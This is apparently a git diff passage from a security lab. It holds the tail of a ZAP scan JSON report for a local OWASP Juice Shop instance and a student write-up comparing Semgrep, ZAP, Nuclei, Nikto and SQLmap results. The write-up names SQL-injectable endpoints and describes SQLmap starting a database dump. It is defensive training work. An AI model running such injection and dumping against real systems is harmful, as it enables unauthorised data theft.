"http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "No links have been found while there are scripts, which is an indication that this is a modern web application." + } + ], + "count": "14", + "systemic": false, + "solution": "

This is an informational alert and so no changes are required.

", + "otherinfo": "

No links have been found while there are scripts, which is an indication that this is a modern web application.

", + "reference": "", + "cweid": "-1", + "wascid": "-1", + "sourceid": "1" + }, + { + "pluginid": "10049", + "alertRef": "10049-1", + "alert": "Non-Storable Content", + "name": "Non-Storable Content", + "riskcode": "0", + "confidence": "2", + "riskdesc": "Informational (Medium)", + "desc": "

The response contents are not storable by caching components such as proxy servers. If the response does not contain sensitive, personal or user-specific information, it may benefit from being stored and cached, to improve performance.

", + "instances":[ + { + "id": "85", + "uri": "http://localhost:3000/ftp/eastere.gg", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "403", + "otherinfo": "" + }, + { + "id": "91", + "uri": "http://localhost:3000/ftp/encrypt.pyc", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "403", + "otherinfo": "" + }, + { + "id": "101", + "uri": "http://localhost:3000/ftp/package.json.bak", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "403", + "otherinfo": "" + } + ], + "count": "3", + "systemic": false, + "solution": "

The content may be marked as storable by ensuring that the following conditions are satisfied:

The request method must be understood by the cache and defined as being cacheable (\"GET\", \"HEAD\", and \"POST\" are currently defined as cacheable)

The response status code must be understood by the cache (one of the 1XX, 2XX, 3XX, 4XX, or 5XX response classes are generally understood)

The \"no-store\" cache directive must not appear in the request or response header fields

For caching by \"shared\" caches such as \"proxy\" caches, the \"private\" response directive must not appear in the response

For caching by \"shared\" caches such as \"proxy\" caches, the \"Authorization\" header field must not appear in the request, unless the response explicitly allows it (using one of the \"must-revalidate\", \"public\", or \"s-maxage\" Cache-Control response directives)

In addition to the conditions above, at least one of the following conditions must also be satisfied by the response:

It must contain an \"Expires\" header field

It must contain a \"max-age\" response directive

For \"shared\" caches such as \"proxy\" caches, it must contain a \"s-maxage\" response directive

It must contain a \"Cache Control Extension\" that allows it to be cached

It must have a status code that is defined as cacheable by default (200, 203, 204, 206, 300, 301, 404, 405, 410, 414, 501).

", + "otherinfo": "", + "reference": "

https://datatracker.ietf.org/doc/html/rfc7234

https://datatracker.ietf.org/doc/html/rfc7231

https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html

", + "cweid": "524", + "wascid": "13", + "sourceid": "40" + }, + { + "pluginid": "10049", + "alertRef": "10049-3", + "alert": "Storable and Cacheable Content", + "name": "Storable and Cacheable Content", + "riskcode": "0", + "confidence": "2", + "riskdesc": "Informational (Medium)", + "desc": "

The response contents are storable by caching components such as proxy servers, and may be retrieved directly from the cache, rather than from the origin server by the caching servers, in response to similar requests from other users. If the response data is sensitive, personal or user-specific, this may result in sensitive information being leaked. In some cases, this may even result in a user gaining complete control of the session of another user, depending on the configuration of the caching components in use in their environment. This is primarily an issue where \"shared\" caching servers such as \"proxy\" caches are configured on the local network. This configuration is typically found in corporate or educational environments, for instance.

", + "instances":[ + { + "id": "66", + "uri": "http://localhost:3000/robots.txt", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "In the absence of an explicitly specified caching lifetime directive in the response, a liberal lifetime heuristic of 1 year was assumed. This is permitted by rfc7234." + } + ], + "count": "1", + "systemic": false, + "solution": "

Validate that the response does not contain sensitive, personal or user-specific information. If it does, consider the use of the following HTTP response headers, to limit, or prevent the content being stored and retrieved from the cache by another user:

Cache-Control: no-cache, no-store, must-revalidate, private

Pragma: no-cache

Expires: 0

This configuration directs both HTTP 1.0 and HTTP 1.1 compliant caching servers to not store the response, and to not retrieve the response (without validation) from the cache, in response to a similar request.

", + "otherinfo": "

In the absence of an explicitly specified caching lifetime directive in the response, a liberal lifetime heuristic of 1 year was assumed. This is permitted by rfc7234.

", + "reference": "

https://datatracker.ietf.org/doc/html/rfc7234

https://datatracker.ietf.org/doc/html/rfc7231

https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html

", + "cweid": "524", + "wascid": "13", + "sourceid": "6" + }, + { + "pluginid": "10049", + "alertRef": "10049-2", + "alert": "Storable but Non-Cacheable Content", + "name": "Storable but Non-Cacheable Content", + "riskcode": "0", + "confidence": "2", + "riskdesc": "Informational (Medium)", + "desc": "

The response contents are storable by caching components such as proxy servers, but will not be retrieved directly from the cache, without validating the request upstream, in response to similar requests from other users.

", + "instances":[ + { + "id": "50", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "63", + "uri": "http://localhost:3000/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "88", + "uri": "http://localhost:3000/ftp/acquisitions.md", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "76", + "uri": "http://localhost:3000/ftp/incident-support.kdbx", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "97", + "uri": "http://localhost:3000/ftp/legal.md", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "69", + "uri": "http://localhost:3000/main.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "67", + "uri": "http://localhost:3000/polyfills.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "64", + "uri": "http://localhost:3000/runtime.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "51", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "62", + "uri": "http://localhost:3000/styles.css", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + }, + { + "id": "72", + "uri": "http://localhost:3000/vendor.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "max-age=0", + "otherinfo": "" + } + ], + "count": "11", + "systemic": false, + "solution": "", + "otherinfo": "", + "reference": "

https://datatracker.ietf.org/doc/html/rfc7234

https://datatracker.ietf.org/doc/html/rfc7231

https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html

", + "cweid": "524", + "wascid": "13", + "sourceid": "7" + } + ] + } + ], + "sequences":[ + ] + +} diff --git a/labs/submission5.md b/labs/submission5.md new file mode 100644 index 00000000..af47e91b --- /dev/null +++ b/labs/submission5.md @@ -0,0 +1,130 @@ +# Lab 5 Submission - SAST and Multi-Tool DAST Analysis + +## Task 1 - SAST with Semgrep + +### Scope and Evidence + +Target source: OWASP Juice Shop `v19.0.0` cloned under `labs/lab5/semgrep/juice-shop`. + +Evidence files: + +- `labs/lab5/semgrep/semgrep-results.json` +- `labs/lab5/analysis/sast-analysis.txt` + +Semgrep reported **8 code-level findings**. The custom/security rules detected high-signal issues in server-side TypeScript routes, especially unsafe dynamic evaluation, raw SQL string construction, weak hashing, and user-controlled redirects. + +### SAST Tool Effectiveness + +Semgrep was effective for vulnerabilities that can be recognized directly in source code before deployment. In this run it found: + +- SQL injection pattern in `routes/search.ts` +- unsafe `eval()` usage in `routes/captcha.ts` and `routes/userProfile.ts` +- insecure MD5 hashing in `lib/insecurity.ts` +- multiple open redirect paths in route handlers + +The result set is smaller than a full dependency scanner because this SAST run focused on code patterns, not package CVEs. Its main value is early developer feedback: it identifies dangerous implementation constructs before the application is running. + +### Five Most Critical Semgrep Findings + +| # | Vulnerability type | File and line | Severity | Evidence | +|---:|---|---|---|---| +| 1 | SQL injection via raw SQL string interpolation | `/src/routes/search.ts:23` | ERROR | `output.juice-shop-sql-string-interpolation` | +| 2 | Dynamic code execution with `eval()` | `/src/routes/captcha.ts:23` | ERROR | `output.juice-shop-eval` | +| 3 | Dynamic code execution with `eval()` | `/src/routes/userProfile.ts:62` | ERROR | `output.juice-shop-eval` | +| 4 | Weak cryptographic hash | `/src/lib/insecurity.ts:43` | WARNING | `output.juice-shop-md5-hash` | +| 5 | User-controlled redirect | `/src/routes/redirect.ts:19` | WARNING | `output.juice-shop-open-redirect` | + +## Task 2 - DAST with ZAP, Nuclei, Nikto, and SQLmap + +### Scope and Evidence + +Target runtime: `bkimminich/juice-shop:v19.0.0` on `http://localhost:3000`. + +Evidence files: + +- `labs/lab5/zap/zap-report-noauth.json` +- `labs/lab5/zap/report-noauth.html` +- `labs/lab5/zap/zap-report-auth.json` +- `labs/lab5/zap/report-auth.html` +- `labs/lab5/zap/auth-check.txt` +- `labs/lab5/zap/admin-application-configuration.json` +- `labs/lab5/nuclei/nuclei-results.json` +- `labs/lab5/nikto/nikto-results.txt` +- `labs/lab5/sqlmap/search-scan.log` +- `labs/lab5/sqlmap/login-scan.log` +- `labs/lab5/sqlmap/results-05082026_1141am.csv` + +### Authenticated vs Unauthenticated ZAP Scanning + +| Scan | URLs reported by ZAP | Alert rules | Alert instances | Severity breakdown | +|---|---:|---:|---:|---| +| Unauthenticated baseline | 95 | 13 | 133 | 2 Medium, 6 Low, 5 Informational | +| Authenticated baseline with JWT header | 95 | 11 | 94 | 2 Medium, 5 Low, 4 Informational | + +The authenticated scan used a Juice Shop admin JWT as an `Authorization: Bearer ...` header. Authentication was verified separately by successfully requesting `/rest/admin/application-configuration`, saved in `labs/lab5/zap/admin-application-configuration.json`. + +In this run the ZAP baseline spider still discovered the same top-level URL count because it did not execute a full logged-in browser workflow. Even so, the authenticated setup matters: APIs that require a session token, such as `/rest/admin/application-configuration`, cannot be assessed correctly with a purely anonymous scanner. For production-grade testing, the stronger approach would be ZAP Automation Framework with browser-based login, AJAX spider, and authenticated active scan. + +### Tool Comparison Matrix + +| Tool | Findings | Severity breakdown | Best use case | +|---|---:|---|---| +| ZAP unauthenticated | 13 alert rules / 133 instances | 2 Medium, 6 Low, 5 Informational | Broad web app baseline, passive checks, headers, content issues | +| ZAP authenticated | 11 alert rules / 94 instances | 2 Medium, 5 Low, 4 Informational | Testing authenticated/API surfaces when a valid session is available | +| Nuclei | 1 template match | 1 Info | Fast known-template discovery and exposed endpoint detection | +| Nikto | 84 reported items | Nikto text findings, mostly headers/exposed files | Web server misconfiguration and interesting file/path checks | +| SQLmap | 2 injectable endpoints | Search and login confirmed SQL injection against SQLite | Deep SQL injection confirmation and exploitation evidence | + +### Tool-Specific Strengths and Example Findings + +**ZAP** is best for broad web application coverage and HTTP response analysis. It found missing Content Security Policy, cross-domain misconfiguration, dangerous JavaScript functions, suspicious comments, and timestamp disclosure. + +**Nuclei** is fast and template-driven. It detected a public Swagger/OpenAPI surface at `/api-docs/swagger.yaml`, which is useful for API discovery and attack surface mapping. + +**Nikto** is useful for web server and path-oriented checks. It reported missing `strict-transport-security`, `referrer-policy`, `permissions-policy`, and `content-security-policy` headers. It also flagged interesting paths such as `/ftp/`, `/public/`, and `/.htpasswd`. + +**SQLmap** is the strongest tool here for SQL injection confirmation. It confirmed: + +- `GET /rest/products/search?q=*` as boolean-based blind SQL injection against SQLite +- `POST /rest/user/login` JSON `email` parameter as boolean-based blind SQL injection against SQLite + +The login scan also started dumping database content. I stopped it after evidence was collected because the full dump exceeded the practical runtime for this lab execution. + +## Task 3 - SAST/DAST Correlation and Security Assessment + +### Findings Summary + +| Category | Result count | +|---|---:| +| SAST: Semgrep code findings | 8 | +| DAST: ZAP unauthenticated alert rules | 13 | +| DAST: ZAP authenticated alert rules | 11 | +| DAST: Nuclei matches | 1 | +| DAST: Nikto items | 84 | +| DAST: SQLmap confirmed injection points | 2 | + +### Correlation + +The clearest correlation is SQL injection. Semgrep found the unsafe SQL construction in `routes/search.ts`, and SQLmap confirmed that the running application is exploitable through `/rest/products/search?q=*`. This is a strong example of SAST and DAST reinforcing the same risk from different angles: source-level root cause plus runtime exploitability. + +SAST-only findings in this run: + +- unsafe `eval()` in source code +- weak MD5 hashing implementation +- open redirect code paths in route handlers + +DAST-only findings in this run: + +- missing or weak HTTP security headers +- public Swagger/OpenAPI exposure +- interesting runtime paths and files such as `/ftp/`, `/public/`, and `/.htpasswd` + +### Recommendations + +1. Use Semgrep in pull requests to catch dangerous code constructs early, especially raw SQL, dynamic evaluation, weak crypto, and redirect logic. +2. Use ZAP against deployed environments to catch HTTP headers, browser-visible issues, and authenticated attack surface. +3. Use Nuclei as a quick template-based exposure check in CI or scheduled scans. +4. Use Nikto for server/path misconfiguration checks during deployment validation. +5. Use SQLmap only in controlled environments for targeted confirmation when SAST or DAST suggests SQL injection risk. +6. Fix the confirmed SQL injection by replacing string-built SQL with parameterized queries. +7. Add strict HTTP security headers, especially CSP, HSTS, Referrer-Policy, and Permissions-Policy.